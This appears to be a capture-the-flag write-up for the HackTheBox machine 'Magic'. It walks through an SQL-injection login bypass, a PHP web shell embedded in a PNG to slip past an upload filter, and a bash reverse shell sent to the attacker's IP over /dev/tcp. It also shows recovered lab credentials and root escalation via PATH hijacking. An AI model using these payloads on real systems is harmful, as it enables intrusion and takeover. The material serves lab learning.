Magic

Magic is a Medium rated difficulty Linux machine from HackTheBox created by TRX. This machine is well designed, is not complex and you don’t have to search from every corner of the machine for some clues. In the current post my IP is 10.10.14.18 and the target’s IP is 10.129.44.173

Gather Information

First of all, let’s start with a basic scan.

Local Terminal
nmap -p- --open -T5 -v -n 10.129.44.173
For now, we can only detect a web site, nothing special.
Nothing suspicious
HTTP Server: Apache/2.4.29
Nothing relevant at simple glance, but by hovering we can find a login page.
By exploring the source code (CTRL+U), we can see some directories, /images/fulls/ and /images/uploads/
Basic login page

Here we are going to try 2 login combinations, a default password and an SQL Injection, {admin : admin} and {admin : ' or 1=1 -- -}. With the second one you will be in.

Upload location

Exploitation

We can upload files and we know the directory /images/uploads/ to visit the image alone (You can test it if you want), so first we will try to upload a PHP file.

With that utility, by writing test.php?cmd={Command} at the end of the URL in the location of the file, we will be able to enter to the machine.

  • Browser: {Upload test.php}

Oh no

By the magic numbers, the file is recognized as a PHP Script file, with knowing this, we will modify a PNG file and add the code.

  • Browser: {search and download a png file}

Adding <?php system($_GET[‘cmd’]); ?> at the 3rd row

  • Browser: {upload downloaded.php.png}

Now we can inject shell commands.

  • Browser: http://10.129.44.173/images/uploads/downloaded.php.png?cmd=whoami

Just a test

So, now we are going to login to the shell, for this we need a local Terminal [Term] and the browser.

  • Browser: http://10.129.44.173/images/uploads/downloaded.php.png?cmd=bash -c ‘bash -i >%26 /dev/tcp/10.10.14.18/443 0>%261’

    • Remember: To use commands at URLs, your ‘&’ are ‘%26’ (URL Encoding)

And now your local terminal [Term] is the target terminal [www-data]
But we can’t get the flag

Ok, we have to find a way to become the user Theseus, our first option is to explore the files of the website.

There is something interesting.
New credentials: {theseus : iamkingtheseus}
His password is another one
Hint to explore mysql, from db.php5
What?
Two alternatives
Returns the configuration, we can’t dump the database using mysqlshow
Inside that output, we found new information. {pass : Th3s3usW4sK1ng }
We are in… now [www-data] is [Theseus]

Privileges Escalation

Until now, nothing important.
Looks like a custom command
Custom command executed as ROOT

We need to know how the command sysinfo works, by using string we can explore the whole command

It’s executing those commands in a relative way (Like fdisk), not absolute, so we can play with it.

So, we have to find from where ($PATH) found the command and change the path priority o execute a non-dangerous fdisk file.

There is the location of fdisk

Now we are going to create a new fdisk and change the PATH to read ours.

Path process complete
Now we have a bash open as root… so [Theseus] is [Root]
PreviousLightweightNextTenten

Last updated